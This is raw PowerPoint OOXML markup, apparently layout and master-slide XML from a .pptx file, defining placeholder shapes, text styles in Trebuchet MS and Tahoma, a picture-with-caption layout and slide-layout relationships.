              <a:defRPr b="0" i="0" sz="900" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr indent="-12631" lvl="6" marL="2743131" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="180"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Trebuchet MS"/>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="900" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr indent="-12619" lvl="7" marL="3200320" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="180"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Trebuchet MS"/>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="900" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr indent="-12608" lvl="8" marL="3657509" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="180"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Trebuchet MS"/>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="900" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="Shape 51"/>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picTx">
  <p:cSld name="含標題的圖片">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="52" name="Shape 52"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="53" name="Shape 53"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2389716" y="4800600"/>
            <a:ext cx="7315200" cy="566739"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="91425" lIns="91425" rIns="91425" tIns="91425"/>
          <a:lstStyle>
            <a:lvl1pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" i="0" sz="2000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:sym typeface="Tahoma"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr indent="0" lvl="1" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" i="0" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:sym typeface="Tahoma"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr indent="0" lvl="2" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" i="0" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:sym typeface="Tahoma"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr indent="0" lvl="3" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" i="0" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:sym typeface="Tahoma"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr indent="0" lvl="4" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" i="0" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:sym typeface="Tahoma"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr indent="-12689" lvl="5" marL="457189" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" i="0" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:sym typeface="Tahoma"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr indent="-12677" lvl="6" marL="914377" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" i="0" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:sym typeface="Tahoma"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr indent="-12665" lvl="7" marL="1371566" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" i="0" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:sym typeface="Tahoma"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr indent="-12654" lvl="8" marL="1828754" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" i="0" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:sym typeface="Tahoma"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54" name="Shape 54"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph idx="2" type="pic"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2389716" y="612775"/>
            <a:ext cx="7315200" cy="4114800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" tIns="91425"/>
          <a:lstStyle>
            <a:lvl1pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="640"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="555DAB"/>
              </a:buClr>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="3200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr indent="-12689" lvl="1" marL="457189" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="555DAB"/>
              </a:buClr>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="2800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr indent="-12677" lvl="2" marL="914377" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Trebuchet MS"/>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="2400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr indent="-12665" lvl="3" marL="1371566" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Trebuchet MS"/>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="2000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr indent="-12654" lvl="4" marL="1828754" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Trebuchet MS"/>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="2000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr indent="-12643" lvl="5" marL="2285943" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Trebuchet MS"/>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="2000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr indent="-12631" lvl="6" marL="2743131" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Trebuchet MS"/>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="2000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr indent="-12619" lvl="7" marL="3200320" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Trebuchet MS"/>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="2000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr indent="-12608" lvl="8" marL="3657509" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Trebuchet MS"/>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="2000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="55" name="Shape 55"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2389716" y="5367337"/>
            <a:ext cx="7315200" cy="804862"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" tIns="91425"/>
          <a:lstStyle>
            <a:lvl1pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="280"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="555DAB"/>
              </a:buClr>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="1400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr indent="-12689" lvl="1" marL="457189" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="240"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="555DAB"/>
              </a:buClr>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="1200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr indent="-12677" lvl="2" marL="914377" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Trebuchet MS"/>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="1000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr indent="-12665" lvl="3" marL="1371566" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="180"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Trebuchet MS"/>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="900" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr indent="-12654" lvl="4" marL="1828754" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="180"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Trebuchet MS"/>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="900" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr indent="-12643" lvl="5" marL="2285943" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="180"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Trebuchet MS"/>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="900" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr indent="-12631" lvl="6" marL="2743131" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="180"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Trebuchet MS"/>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="900" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr indent="-12619" lvl="7" marL="3200320" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="180"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Trebuchet MS"/>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="900" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr indent="-12608" lvl="8" marL="3657509" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="180"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Trebuchet MS"/>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="900" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="56" name="Shape 56"/>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9.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout8.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout11.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout10.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image00.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image01.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout7.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout13.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout12.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme1.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9" name="Shape 9"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Shape 10"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId1">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="-33111"/>
            <a:ext cx="1610829" cy="1610829"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Shape 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5712883" y="3429001"/>
            <a:ext cx="1871132" cy="1412874"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="lt1"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="45700" lIns="91425" rIns="91425" tIns="45700">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Shape 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2123018" y="260351"/>
            <a:ext cx="10068983" cy="827088"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="91425" lIns="91425" rIns="91425" tIns="91425"/>
          <a:lstStyle>
            <a:lvl1pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" i="0" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:sym typeface="Tahoma"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr indent="0" lvl="1" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
